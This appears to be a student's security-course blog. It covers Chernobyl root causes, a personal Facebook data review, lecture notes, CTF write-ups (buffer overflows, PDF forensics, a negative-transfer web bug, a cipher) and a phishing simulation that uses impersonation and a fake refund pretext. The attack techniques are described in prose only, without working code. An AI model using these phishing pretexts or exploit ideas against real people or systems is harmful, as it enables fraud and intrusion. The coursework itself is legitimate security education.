Chernobyl

Richard research one of the three nuclear accidents.

Chernobyl was a accident which was caused by all of the three main root causes which was talked about in the lecture. 

The human error can be seen in a number of cases. The nuclear oversee was arrogant and had not had anything happen over his 25 years in operation and assumed he knew exactly how things worked and majorly strained the nuclear reactor. He also denied the fact that the reactor exploded as he though that it was impossible to explode which caused misinformation up the chain of command.

The culture cause can be seen as the government in power knew about issues of the reactor but kept them a state secret. Employees also hasty rushed there tests as they were striving for achievements instead of caring about the actual test ran properly. This also delayed evacuation processes as the state did not want to admit something went wrong, possibly causes thousands of lives

The system error occurs when the nuclear operators correctly pressed the AZ-5 button which is the total shutdown of the nuclear plant but it was this action that caused the explosion due to a major flaw in the design of the nuclear plant. Imagine if you hit the breaks hard on you car and instead of stopping you rush ahead. This is an obvious misplaced trust in the system.

Google Yourself

This task is to download your data and analyse what you have found. I downloaded my facebook data and i was quite surprised that all conversation were stored. i mean i should have expected this part as i am able to search messages i sent along time ago. Conversation from groups that you have left are still stored although i believe if you deleted the conversation history, it wouldn't be stored (guessing its still stored for the others in the chat tho). i just what is also surprising but should be is that facebook has its own phonebook and i feel like you can get anyone number as long as you are friends with them allowing to start a voice chat via fb messenger. 

Other information stored is search history, games played, public polls voted on, posts,comments and any saved items. Other interesting information is security and login information. FB stores all the ip address that you have used in the past and also the device with which you login with. With this i predict that they are able to determine if an unwanted login is made especially if its from an unknown ip address.All session information is also stored. There is a bunch of cookie information with dates and times under them, not entirely sure what they are used for. 

Lastly is the most interesting part. FB ads information. Based off of you Facebook activity and other actions interests are created. (Other actions i am assuming being searching on other sites as there have been multiple times i looked to buy something and the next day its an ad on facebook). On top of this there is advertiser who run ads using contact list they uploaded, meaning you are getting ads from these companies and lastly fb stores which ads you have interacted with (which ads are being clicked) and i believe that they would use this information to show you similar ads (be wary of what ads you click on!!). Remember they store all information from the day you create your account!

login Leak

Goal is to reconstruct a password from 1000 3 letter parts. The password has not reoccurring  characters and the order of the passwords is maintained.

Here we can see a bunch of 6, so its safe to assume that even though they are in the right order they might not be directly next to each other.

My solution would be to line up all the similar characters vertically to determine their actual position. From the previous screenshot we can determine that we can combine the second the last line together. and we know there is a 2 n between the _ and 6. we can continuously do this to find the answer. Although im not up to the task to actually do this right now as it seems very time consuming. Maybe when i get more free time i will attempt this.

Spot the fake

Recently I was surfing youtube and come across a video of a food scientist reviewing video of a popular food channel. Not going to name any channels. This youtube channel being reviewed was massive and they had a lot of views however in the review video, many of the recipes used were shown to be fake and didn't work very well.

Nevertheless the video was a big hit. I think they achieved this by superior video editing skills and something that seems that it might work but in actuality doesn't. It can be detected by following their recipe and finding out it doesn't work or doing some research. Prevention is quite hard as youtube algorithm favors videos with likes and since the vast majority of people have like these sorts of videos they will always be popular.

Something that can easily be faked is social media, images and peoples perception of you. This can easily be faked by creating a fake story and backing it up with a image. maybe you dont go to the gym, but want people to think you do. Go to the gym and take a photo of yourself and post it. There are many photos on Instagram that use Photoshop to make the people look better.

Stargate Ghost problem

The stargate ghost problem is when you discover a portal to a new alien world and you as a major in the army send in a cadet into the portal. An alien returns claiming the cadet is with him has turned invisible. The goal is to get a report from the cadet through the alien including information such as if the alien is to be trusted or if there is anything that needs to be done urgently based on the information (such need of defense as the aliens are planning to attack) the problem is the alien has become the middle man.

During the group discussion we started off pretty rough. We didn't know how to avoid the middle man attack. We first thought of the diffie-hellman key exchange to generate keys, however this is susceptible to man in the middle attack. we then though we could use a HMAC for the cadet to send his report, but this scenario would only work if the cadet had very good computing power and this was unlikely. It was when i got the idea to use a OTP and separate the ghost cadet and the alien. The cadet would see the OTP and use it to encrypt his report then the major would be able to decrypt the message to get the report. This should work under the circumstances as the alien has no knowledge of the OTP. If the alien is hostile and tries to change the message, the cipher text would be altered, however it would be unlikely that the now plain-text would make any sense.

Lecture 8

This weeks lecture divided me. The first lecture was quite good but i caught myself nodding off in the second lecture. 

The first lecture was about root cause analysis and what is generally the cause of problems:

Human error

Culture

System

Richard also when through how it easily it is to misdirect people. if you want someone to look at you, just start talking. if you want people to look at your hand start waving. He compared magicians to social engineers and how it is timing that is the important factor. making you look in one place at a certain time.

Richard gave an light in the dark example which emphasised how people can only concentrate on one little thing at a time and during a crisis it is hard to look at the big picture.

frequency gambling - people use patterns that they have used most in the past

we automatically use patterns that we are comfortable with and have been know to work in the past which is great in general but can somethings mislead us

difference between an accident and an attack is the intent. In an accident there is not malicious intent but there is in an attack.

the second lecture was story time with Richard. He read out important parts of a book on the three mile island accident. It kind of when through the root cause due to all of the above. human error, culture and most importantly system. The main points was that every system is gong to have problems and our goal is 

-design the system so that when things go wrong the impact is limited

-identify what it is we are trying to protect

SA - dragon process

So i attempted to do a rookie task dragon, i opened the code in a program called ida which is a disassembler program and figured out that there was a secret level in the character selection page if your input was 3

then the secret level got %10s from input and compared it with the “Nice_try...” line, i think and we want the result to be 0 as the next line “test eax eax” will set the zero flag to 1 and it will not jump and give us a shell. 

However the problem occurs as we can only input 10 bytes and the line compared is much longer. it would be good if there is a way to jump straight to the shell call. I have spent quite a bit of time and i still haven’t figured it out.

Secsoc CTF - Reference letter 2

This was also done after the CTF ended so i didnt get any points for finishing this CTF.

This time the file actually worked however the flag wasn't there at all and the meme suggested to look at the pdf spec whilst the hint says 

after googling rtfd i found it was a file format and maybe i needed to convert it to that file format?? after trying to see what i could do with pdf i tried pdftotext which seemed liked the closest to rtfd

so there was some error with a ref after looking at the pdf with a text editor and looking up how a pdf is should look i find that there is a little extra bit added on after the pdf ends.  %%EOF is usually the ending of pdf

i also realise that the 12 reference isn’t even used in the PDF. (The third column with n or f tells you if they are in use n for in use and f for not)

so i decide to just remove the part after the “%%EOF” and it worked.

and there we go, i suspect that ref 12  covered over the image. The last curly bracket is also missing but if i just add it in it worked as the flag

Secsoc CTF - Reference letter

I completed this challenge after the CTF ended and thus it didn’t go towards the score i showed earlier

This CTF was under the forensics section and only gave a link to google drive which said the file couldn’t open. When i first looked at the file i used strings and there was a line talking about pdf magic numbers. This was referring to the first line where %pdf was supposed to be %PDF. I changed it and could view the file.

However when i tried to download the original file again to test it. i found that i could already view the pdf without any trouble so i dont know exactly what’s going on but it does explain the high number of solves. Definitely easy and not really worth 100 points imo.

Secsoc CTF - k17coin

This challenge was part of Web and gave you 5 accounts with $100 each in them. It allowed for transfers between the accounts and buying certain items

Shop List:

Functions:

With these function i had to test some edge cases and ultimately tested using negative money as transfers to see it was similar to the blackjack game from pwnable.kr and it was!!

The flag was easily bought cause i am rich now!!!!

Secsoc CTF - rotation

After downloading the cupcake file and opening it, it just contained a bunch of letters. However since learning about ciphers i quickly realized it was a sort of cipher and cheated a little by using an online cipher breaker.

Hey who has the time to manually do this?

after using the online subsitution cipher decoder we realised it was indeed a monoalphabetic substitution cipher and found:

}llor eistoot ekaceseehc tressed sraeb immug evol I{GALF

which we reversed and found:

FLAG{I love gummi bears dessert cheesecake tootsie roll}

Easy enough!!

Secsoc CTF - bufff

This challenge which was directed to us was the buffer overflow challenge. So it was the first one that i started working on. I first downloaded the binary and chmod it to get permission to run it. After running it i was presented with the following screen:

which lead me to think that there was some sort of gets command which fetches user input. So my goal was to determine how large this buffer was and try to place my own address in the return address. I then ran objdump to see the assembly code. I found a few interesting functions other than main which were indestructible and ohSh1t.  indestructible was called in main, but ohSh1t was never called so i figured that that was the address that we wanted in the return address.

i figured the red part was the output from the previous picture and the yellow underlined part was the buffer. Similar to how i solved the buffer overflow challenges given by caff, i knew what to do.

I thought that i had got it initially and that was the flag, but i soon realized that there was server to connect to and found the flag soon after reusing code i used for pwnable bof.

Done!!

Time management update

The job app is due this weekend on Sunday 5 pm. I don’t want to rush everything in the last minute so i have just started on creating my job app on openlearning. Took a bit because i missed the big ‘Create Page button’ and kept create old style pages making me quite confused. But i sorted out all that now, i now need to finish up on my blogs add and link them in my job app!! I also have to do my video on my SA that’s due tomorrow. 

Started on job app almost a week ahead of its due!! :D

alloca- progress

This problem goes through a buffer overflow example simply stating how easy it if to avoid buffer overflow. Here is a simple runthrough

i got far enough to realise that imputing a negative value to assigning the buffer would give a buffer overflow as there is no buffer but i didn’t know the exact value i should be making the buffer

looking at the assembly instruction didn’t help me much either as i just got more confused as to what was actually happening, but maybe if i rest on it and come back then it’ll click

asm -progress

I tried doing this challenge on shellcodes and looked all over the internet for shellcode.(Its full of it) basically i hit a bunch of articles which explain how to craft your own shellcode and another bunch of articles suggesting that there is so much shellcode that there is no need to make your own. Nonetheless i tried all sorts of shellcode and non of them worked.So i decided to make my own, kind of. I used pwntools and it from what i read the code below should have worked but it didnt so maybe i was using a system call that wasn’t just using open, read and write calls. I still think i’m quite close to the solution.

SecSoc CTF

Yesterday i went to the term2 secsoc CTF.

I worked with Dale on the CTF and we knew that we weren’t going for the prizes as we both were fairly new to this type of competition. We worked on the CTF for about 3 hrs then I worked a few more hrs after the competition was over. We got a total of 3 challenges done during the CTF and I managed to do 2 more after the competition was over.

Our team name was noobies

The majority of the fails was due to not realizing the flag input

We managed to complete the buffer overflow challenge which was for students of 6[48]41 which we are!!

I will blog about the challenges that we solved

I liked doing the challenges, it was like a little puzzle game testing your knowledge.

Social Engineering Sim - Email Phishing

So this task allowed us to do some phishing in order to get some details and organised a payment. I feel that in a small team a lot of things can be quickly verified so they can find out the legitimacy of the email quickly however as we are up against some bots (i think) so i can send out as many emails as i want

For the facebook login i requested sarah for login details and posed as david the other employee.

This didnt work, so i made it more clear and justified why i needed the login details. Nice i got the first part!!

The second goal is to organize a payment to a fake account. I ask about payments and she redirected me to David

After sending an email to david i found that i needed the payment to be more urgent.

In this email i posed as sarah and said the dogs lives were on the line.. couldn't believe it didn't work.

I felt so close last time and this time i decided to be pose as a donor and accidentally gave too much money and require a refund to pay my bills and it worked